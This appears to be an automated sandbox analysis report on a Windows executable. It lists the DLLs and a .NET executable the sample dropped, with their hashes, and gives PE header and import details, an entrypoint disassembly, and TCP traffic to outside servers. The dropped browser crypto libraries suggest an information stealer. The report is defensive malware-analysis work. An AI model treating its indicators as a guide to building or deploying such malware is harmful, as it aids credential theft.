Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\al[1].exe Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	7079424
Entropy (8bit):	6.2785396823769615
Encrypted:	false
SSDEEP:	98304:irDWx+sEyGH9uTxld4arwlwZ6szR4QR66CxVCiKjjnteQxNGJO1Ik9tItz2t4e:iWx+sUH9oXdfrwknr+VCvnteQaOIkp
MD5:	D9C2993126C94CCFD546F3A9F3F84AB5
SHA1:	9FD3A5EF9D341B95352394D3795CD4EFBB23C62F
SHA-256:	77CE302FDA0F50D3ECBF90A2A66820038E92D191022BE38B1FFE3988A8B8D3D2
SHA-512:	AEAC9B7D02563C226D42FB506CBE1B49B4918D75D121022B380880CC0ABFCDC2A497EB8DEC1B1BB6A42406E592874AEDBCB2FD82E575F0E20D92286BBE9F6D16
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..[..................k...........l.. ... l...@.. .......................`l...........`...................................l.W.... l......................@l...................................................... ............... ..H............text.....k.. ....k................. ..`.rsrc........ l.......l.............@..@.reloc.......@l.......l.............@..B..................l.....H.......`lk.$.......-...P....uh..........................................m..H`..gl...Q.K..j......<..^.N....l...K.oq....)..n.....1.#'.....-.z.GO.<,^....'atu.z....;..m#.f..Z.].:....\|.........F.'...\{j.H......:..~8.). ,.q]Y...W..D...3.Y...1.N......0....".;..r...R.U.....@K......{.....Cm...j.W.....GBAv..n...9....z\U..+.2.n.._.I(&.9..".~^`........-.P5.<D.c5z.$.......\|:t#..y....E3...e".V.....<.C..#$7..,.L....\|P?.k......z. ......!.'..........KA"L.p*..xD...!.;..I..n

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\al[1].exe Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.5219280948873621
Encrypted:	false
SSDEEP:	3:hn:h
MD5:	FDA44910DEB1A460BE4AC5D56D61D837
SHA1:	F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256:	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512:	57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious:	false
Preview:	0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.464921760389028
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MSQNZmmg2F.exe
File size:	741376
MD5:	deae95754f08661dc895299dd91b6443
SHA1:	a3f86e7ab8d33ce2ee15aac5f75e998407addbfb
SHA256:	3276f5cb5545e19704b1ef2897c17d721d6e156323f48f19275997d3cc62d005
SHA512:	1386b45f8f1535193a798c8d4342a15c2269f5d76a9579e35ada7a2dcf6e8198a54b2b9b7781e8004a0917f75e4da294a721d0090bf3ade2782e4e3cea2de6f2
SSDEEP:	12288:YYK2EUGqBZJLHjBVMUiJq/lEiLsnUKsSjFH8VakFPkiiTVhj5qnGd84eTQ:hGzqZBmUikNEvntbhH0OxeXQ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.x.I.+.I.+.I.+.?.+.I.+.?/+.I.+.?.+.I.+.1"+.I.+.I.+.I.+.?.+.I.+.?++.I.+.?,+.I.+Rich.I.+........PE..L...F.?_...................

File Icon


Icon Hash:	aedaae9ec6a68aa4

Static PE Info

General
Entrypoint:	0x483de0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F3FB046 [Fri Aug 21 11:30:14 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	470518591ed4a5fa094199423463cb10

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F99A095BDFBh
call 00007F99A095B4B6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 004A1350h
push 00488530h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [004A3064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401050h]
cmp dword ptr [01714D38h], 00000000h
jne 00007F99A095B4B0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [004010D8h]
call 00007F99A095B633h
mov dword ptr [ebp-6Ch], eax
call 00007F99A095FB2Bh
test eax, eax
jne 00007F99A095B4ACh
push 0000001Ch
call 00007F99A095B5F0h
add esp, 04h
call 00007F99A095F488h
test eax, eax
jne 00007F99A095B4ACh
push 00000010h
call 00007F99A095B5DDh
add esp, 04h
push 00000001h
call 00007F99A095F3D3h
add esp, 04h
call 00007F99A095D1ABh
mov dword ptr [ebp-04h], 00000000h
call 00007F99A095CD8Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1984	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1316000	0x2e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1319000	0x1920	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1210	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x83be8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1bc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa13f8	0xa1400	False	0.866136749031	data	7.82517098511	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xa3000	0x1272d3c	0x1c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1316000	0x2e00	0x2e00	False	0.729874320652	data	6.26529910076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1319000	0xed32	0xee00	False	0.0903361344538	data	1.16114239298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x13161b0	0x25a8	dBase III DBT, version number 0, next free block index 40	Spanish	Paraguay
RT_STRING	0x1318908	0x43e	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1318d48	0xb8	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x1318770	0x68	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x1318758	0x14	data	Spanish	Paraguay
RT_VERSION	0x13187d8	0x130	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL	Import
KERNEL32.dll	ExitProcess, FileTimeToDosDateTime, CreateTimerQueue, InterlockedIncrement, FlushViewOfFile, OutputDebugStringW, GetProcessPriorityBoost, GetModuleHandleW, GetTickCount, GenerateConsoleCtrlEvent, IsBadReadPtr, GetConsoleAliasesLengthA, CreateActCtxW, GlobalAlloc, SetFileShortNameW, GetSystemTimeAdjustment, GetVersionExW, GetEnvironmentVariableA, CompareStringW, lstrlenW, GetStartupInfoW, FindFirstFileExA, SetLastError, GetProcAddress, GetLongPathNameA, CopyFileA, CreateMemoryResourceNotification, SearchPathA, _hwrite, OpenWaitableTimerA, OpenMutexA, RegisterWaitForSingleObject, OpenWaitableTimerW, SetConsoleOutputCP, SetCurrentDirectoryW, WriteProfileSectionW, AddAtomA, GetModuleFileNameA, WTSGetActiveConsoleSessionId, CreateIoCompletionPort, GetModuleHandleA, GetProcessShutdownParameters, FreeEnvironmentStringsW, FillConsoleOutputAttribute, GetCurrentDirectoryA, CompareStringA, GetVersionExA, AddConsoleAliasA, DeleteFileA, CloseHandle, CreateFileW, SetStdHandle, GetConsoleMode, GetCommandLineW, HeapSetInformation, SetUnhandledExceptionFilter, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, InterlockedDecrement, DecodePointer, GetModuleFileNameW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapValidate, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetLastError, HeapCreate, WriteFile, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, LoadLibraryW, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, GetStringTypeW, MultiByteToWideChar, OutputDebugStringA, WriteConsoleW, WideCharToMultiByte, LCMapStringW, IsProcessorFeaturePresent, RaiseException, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll	GetMessagePos
WINHTTP.dll	WinHttpQueryOption

Version Infos

Description	Data
Translation	0x0152 0x0013

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Paraguay
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2021 16:53:22.461930037 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.461962938 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.462050915 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.480433941 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.480470896 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.580739975 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.580935955 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.855106115 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.855158091 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.855511904 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.855609894 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.859581947 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.903203964 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.956676960 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.956705093 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.956731081 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.956784010 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.956809044 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.956824064 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.956830978 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:22.956928015 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.959386110 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.959906101 CEST	49736	443	192.168.2.7	88.99.75.82
Oct 16, 2021 16:53:22.959923983 CEST	443	49736	88.99.75.82	192.168.2.7
Oct 16, 2021 16:53:23.102191925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.142419100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.142513990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.145035982 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.185188055 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.230283022 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.230756044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.234201908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.273576021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.273890972 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.273943901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.273982048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274065018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274069071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274082899 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274086952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274120092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274144888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274163961 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274177074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274213076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274301052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274385929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274424076 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274435043 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274439096 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274441957 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.274445057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.274827003 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.313867092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.313978910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.313983917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314004898 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314027071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314044952 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314062119 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314063072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314069033 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314081907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314100027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314116001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314132929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314146042 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314158916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314169884 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314182997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314194918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314198017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314205885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314208031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314213991 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314223051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314235926 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314321995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314333916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314340115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314349890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.314395905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.314426899 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.353694916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353735924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353764057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353785038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353806973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353811979 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.353830099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353847027 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.353854895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353889942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353913069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353940964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353965998 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353971958 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.353980064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.353988886 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.353990078 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354007959 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354031086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354053974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354054928 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354075909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354096889 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354120016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354123116 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354134083 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354141951 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354165077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354167938 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354190111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354198933 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354212999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354237080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354245901 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354262114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354284048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354290009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354310989 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354319096 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354334116 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354357958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354366064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354381084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354403019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354424953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354429007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354454041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354475975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354497910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354510069 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354521990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354533911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354538918 CEST	49737	80	192.168.2.7	65.108.80.190
